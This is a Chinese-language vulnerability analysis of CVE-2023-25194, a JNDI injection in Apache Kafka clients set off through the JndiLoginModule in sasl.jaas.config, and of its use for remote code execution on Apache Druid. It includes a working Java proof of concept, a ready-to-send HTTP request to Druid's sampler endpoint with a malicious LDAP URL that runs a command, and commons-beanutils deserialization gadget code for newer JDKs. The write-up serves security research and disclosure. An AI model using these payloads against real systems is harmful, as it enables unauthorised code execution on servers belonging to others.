Apache Kafka Clients JNDI (CVE-2023-25194) 分析以及在 Apache Druid 环境下的利用
Apache Kafka Clients JNDI (CVE-2023-25194)
影响版本: 2.3.0-3.3.2, 3.4.0 及以上的版本不受影响
漏洞的本质其实是 Kafka 支持基于 JAAS 的 SASL 认证, 看到网上的分析文章竟然没怎么提这个, 这里就简单说一下
https://zh.wikipedia.org/wiki/简单认证与安全层
https://zh.wikipedia.org/wiki/JAAS
SASL 是一种在网络协议中用于认证和数据加密的标准, 而 JAAS 是 SASL 在 Java 中的一个实现
JAAS 是一个以用户为中心的安全框架, 作为 Java 以代码为中心的安全的补充
有趣的是 Shiro (JSecurity) 最初被开发出来的原因就是由于当时 JAAS 存在着许多缺点
Kafka 配置认证的相关文档: https://kafka.apache.org/documentation/#security
在 Kafka 中, 支持动态配置 JAAS 认证
https://kafka.apache.org/documentation/#security_client_dynamicjaas
https://kafka.apache.org/documentation/#brokerconfigs_sasl.jaas.config
也就是说我们可以直接将 JAAS 配置项作为 producer 或 consumer 的属性 (properties), 而无需创建物理配置文件, 这个属性的名字就是 sasl.jaas.config
JAAS 官方文档
https://docs.oracle.com/javase/8/docs/technotes/guides/security/jaas/JAASRefGuide.htm
https://docs.oracle.com/javase/7/docs/technotes/guides/security/jaas/tutorials/LoginConfigFile.html
sasl.jaas.config
的格式如下
1
|
loginModuleClass controlFlag (optionName=optionValue)*;
|
其中的 loginModuleClass 代表认证方式, 例如 LDAP, Kerberos, Unix 认证
JDK 自带的 loginModule 位于 com.sun.security.auth.module

其中的 JndiLoginModule 原本是为了支持以 JNDI 的方式查询各种 Service Provider 从而进行身份认证, 但是由于在认证过程中的 user.provider.url
参数可控, 导致可以进行任意 lookup, 引发 JNDI 注入
在给出 PoC 之前, 先来了解一下 Kafka 的相关概念
参考文章: https://segmentfault.com/a/1190000021138998
Kafka 本质上是一个分布式, 订阅式, 支持流式处理的消息队列, 通过 ZooKeeper 管理集群, 几个基本概念如下
- 消息: Kafka 中的数据单元, 也被称为记录, 类似于数据表中某一行的记录
- 主题: 消息的种类称为主题 (Topic), 相当于对消息进行分类, 类似数据库中的表
- 生产者: 向主题发布消息的客户端应用程序称为生产者 (Producer), 生产者用于持续不断的向某个主题发送消息
- 消费者: 订阅主题消息的客户端程序称为消费者 (Consumer), 消费者用于处理生产者产生的消息
- Broker: 一个独立的 Kafka 服务器就被称为 Broker, Broker 接收来自生产者的消息, 为消息设置偏移量, 并提交消息到磁盘保存
Kafka 的四个核心 API
- Producer API: 它允许应用程序向一个或多个 topics 上发送消息记录
- Consumer API: 允许应用程序订阅一个或多个 topics 并处理为其生成的记录流
- Streams API: 它允许应用程序作为流处理器, 从一个或多个主题中消费输入流并为其生成输出流, 有效的将输入流转换为输出流
- Connector API: 它允许构建和运行将 Kafka 主题连接到现有应用程序或数据系统的可用生产者和消费者. 例如 关系数据库的连接器可能会捕获对表的所有更改
本文中提到的 CVE-2023-25194 为 Kafka Client 的漏洞, Kafka Client 的作用就是将某个服务作为生产者或消费者连接到 Kafka Server, 然后不断发送/接收消息并进行后续处理
因为 Kafka 支持配置 JAAS 认证, 所以 Client 要想连接到 Server, 就也必须要先配置与 Server 一致的 JAAS Module, 如果这时候将 Module 指定为 JndiLoginModule, 同时配置恶意的 user.provider.url
, 就可以在向 Server 发起连接之前, 在 Client 端引发 JNDI 注入
PoC 如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
import org.apache.kafka.clients.consumer.KafkaConsumer;
import org.apache.kafka.clients.producer.KafkaProducer;
import java.util.Properties;
public class Demo {
public static void main(String[] args) throws Exception {
Properties properties = new Properties();
properties.put("bootstrap.servers", "127.0.0.1:1234");
// for KafkaProducer
// props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
// props.put("value.serializer","org.apache.kafka.common.serialization.StringSerializer");
// for KafkaConsumer
properties.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
properties.put("value.deserializer","org.apache.kafka.common.serialization.StringDeserializer");
properties.put("sasl.mechanism", "PLAIN");
properties.put("security.protocol", "SASL_SSL");
properties.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule " +
"required " +
"user.provider.url=\"ldap://127.0.0.1:1389/Basic/Command/open -a Calculator\" " +
"useFirstPass=\"true\" " +
"group.provider.url=\"xxx\";");
// KafkaProducer<String, String> kafkaProducer = new KafkaProducer<>(properties);
// kafkaProducer.close();
KafkaConsumer<String, String> kafkaConsumer = new KafkaConsumer<>(properties);
kafkaConsumer.close();
}
}
|
依赖
1
2
3
4
5
|
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>kafka-clients</artifactId>
<version>3.2.2</version>
</dependency>
|
注意整个过程其实并没有与 bootstrap.servers
进行通信, 所以这个值只要格式正确就行
至于为什么要配置 sasl.mechanism
和 security.protocol
, 原因都可以在官方文档和源码里面找到
调试流程, 以 KafkaConsumer 类为例

在 KafkaConsumer 的构造方法中, 会初始化 config (即 properties) 并创建 ChannelBuilder


当 securityProtocol 为 SASL_SSL
或 SASL_PLAINTEXT
时, 会创建 JaasContext


调用 channelBuilder 的 configure 方法

在这里会获取 LoginManager





此时调用 JndiLoginModule 的 initialize 方法


再次调用 JndiLoginModule 的 login 方法

最开头除了 userProvider 以外还会验证 groupProvider, 如果为空就会抛出异常

当 tryFirstPass 或 useFirstPass 为 true 时, 会调用 attemptAuthentication 方法

触发 JNDI 注入
在 3.4.0 版本中, 官方的修复方式是增加了对 JndiLoginModule 的黑名单
org.apache.kafka.common.security.JaasContext#throwIfLoginModuleIsNotAllowed
1
2
3
4
5
6
7
|
private static void throwIfLoginModuleIsNotAllowed(AppConfigurationEntry appConfigurationEntry) {
Set<String> disallowedLoginModuleList = (Set)Arrays.stream(System.getProperty("org.apache.kafka.disallowed.login.modules", "com.sun.security.auth.module.JndiLoginModule").split(",")).map(String::trim).collect(Collectors.toSet());
String loginModuleName = appConfigurationEntry.getLoginModuleName().trim();
if (disallowedLoginModuleList.contains(loginModuleName)) {
throw new IllegalArgumentException(loginModuleName + " is not allowed. Update System property '" + "org.apache.kafka.disallowed.login.modules" + "' to allow " + loginModuleName);
}
}
|
Apache Druid RCE via Kafka Clients
影响版本: <= 25.0.0, 26.0.0 及以上不受影响 (截至目前暂未正式发布)
Apache Druid 是一个实时分析型数据库, 它支持从 Kafka 中导入数据 (Consumer) , 因为目前最新版本的 Apache Druid 25.0.0 所用 kafka-clients
依赖的版本仍然是 3.3.1, 即存在漏洞的版本, 所以如果目标 Druid 存在未授权访问 (默认配置无身份认证), 则可以通过这种方式实现 RCE
有意思的是, Druid 包含了 commons-beanutils:1.9.4
依赖, 所以即使在高版本 JDK 的情况下也能通过 LDAP JNDI 打反序列化 payload 实现 RCE
Druid Web Console - Load data - Apache Kafka


问题主要出在 Consumer properties 这块, 它实际上对应的就是之前实例化 KafkaConsumer 时传入的 properties, 所以依然可以配置 sasl.jaas.config
POST /druid/indexer/v1/sampler
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
|
{
"type": "kafka",
"spec": {
"type": "kafka",
"ioConfig": {
"type": "kafka",
"consumerProperties": {
"bootstrap.servers": "127.0.0.1:1234",
"sasl.mechanism": "PLAIN",
"security.protocol": "SASL_SSL",
"sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://127.0.0.1:1389/Basic/Command/open -a Calculator\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic": "23",
"useEarliestOffset": true,
"inputFormat": {
"type": "regex",
"pattern": "([\\s\\S]*)",
"listDelimiter": "56616469-6de2-9da4-efb8-8f416e6e6965",
"columns": ["raw"]
}
},
"dataSchema": {
"dataSource": "sample",
"timestampSpec": {
"column": "!!!_no_such_column_!!!",
"missingValue": "1970-01-01T00:00:00Z"
},
"dimensionsSpec": {},
"granularitySpec": {
"rollup": false
}
},
"tuningConfig": {
"type": "kafka"
}
},
"samplerConfig": {
"numRows": 500,
"timeoutMs": 15000
}
}
|

高版本打 commons-beanutils no cc payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
package com.example.CommonsBeanutils;
import com.example.Reflection;
import com.example.Serialization;
import com.example.TemplatesEvilClass;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import java.util.Base64;
import java.util.PriorityQueue;
public class CommonsBeanutils1NoCC {
public static void main(String[] args) throws Exception{
TemplatesImpl templatesImpl = new TemplatesImpl();
ClassPool pool = ClassPool.getDefault();
CtClass clazz = pool.get(TemplatesEvilClass.class.getName());
byte[] code = clazz.toBytecode();
Reflection.setFieldValue(templatesImpl, "_name", "Hello");
Reflection.setFieldValue(templatesImpl, "_bytecodes", new byte[][]{code});
Reflection.setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl());
// BeanComparator beanComparator = new BeanComparator(null, Collections.reverseOrder());
BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator);
priorityQueue.add("1");
priorityQueue.add("1");
beanComparator.setProperty("outputProperties");
Reflection.setFieldValue(priorityQueue, "queue", new Object[]{templatesImpl, templatesImpl});
// Serialization.test(priorityQueue);
System.out.println(Base64.getEncoder().encodeToString(Serialization.serialize(priorityQueue)));
}
}
|

在 druid-kafka-indexing-service 这个 extension 中可以看到实例化 KafkaConsumer 的过程

Apache Druid 26.0.0 更新了 kafka 依赖的版本
https://github.com/apache/druid/blob/26.0.0/pom.xml#L79
